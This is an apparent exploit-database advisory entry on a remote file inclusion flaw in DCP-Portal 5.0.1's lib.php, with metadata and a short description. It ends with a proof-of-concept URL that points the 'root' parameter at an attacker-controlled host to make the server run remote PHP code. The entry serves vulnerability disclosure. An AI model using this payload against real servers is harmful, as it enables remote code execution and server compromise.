DCP-Portal 5.0.1 - 'lib.php?Root' Remote File Inclusion
Author: frog
type: webapps
platform: php
port:
date_added: 2003-01-06
date_updated: 2012-10-21
verified: 1
codes: OSVDB-7026
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/6525/info
DCP-Portal is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers.
An attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for some parameters.
If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. Successful exploitation may provide local access to the attacker.
http://www.example.com/library/lib.php?root=http://attacker.org